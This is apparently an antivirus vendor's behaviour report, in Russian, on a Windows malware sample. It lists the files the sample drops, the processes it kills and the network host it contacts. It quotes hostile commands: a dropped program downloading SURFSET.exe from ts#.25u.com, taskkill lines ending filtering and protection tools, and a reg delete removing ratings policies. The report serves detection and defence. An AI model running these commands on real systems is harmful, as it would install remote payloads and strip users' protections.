Техническая информация
Вредоносные функции:
Создает и запускает на исполнение:
- '%WINDIR%\ehome\wmild.exe' -c http://ts#.25u.com/SURFSET.exe
Запускает на исполнение:
- '<SYSTEM32>\taskkill.exe' /f /im safesurf.exe
- '<SYSTEM32>\taskkill.exe' /f /im surfguard.exe
- '<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
- '<SYSTEM32>\taskkill.exe' /f /im nvidsrv.exe
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\ehome\ser.bat" "
- '<SYSTEM32>\taskkill.exe' /f /im ipz.exe
- '<SYSTEM32>\taskkill.exe' /f /im ipz2.exe
Изменения в файловой системе:
Создает следующие файлы:
- %WINDIR%\ehome\wmild.exe
- %WINDIR%\ehome\sc.exe
- %WINDIR%\ehome\SURFSET.exe
- %WINDIR%\ehome\ser.reg
- %WINDIR%\ehome\instsrv.exe
- %WINDIR%\ehome\ser.bat
- %WINDIR%\ehome\DNS.bat
- %WINDIR%\ehome\cmsdll.exe
- %WINDIR%\ehome\setu.bat
Сетевая активность:
Подключается к:
- 'ts#.25u.com':80
TCP:
Запросы HTTP GET:
- ts#.25u.com/SURFSET.exe
UDP:
- DNS ASK ts#.25u.com
Другое:
Ищет следующие окна:
- ClassName: '(null)' WindowName: '(null)'
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'
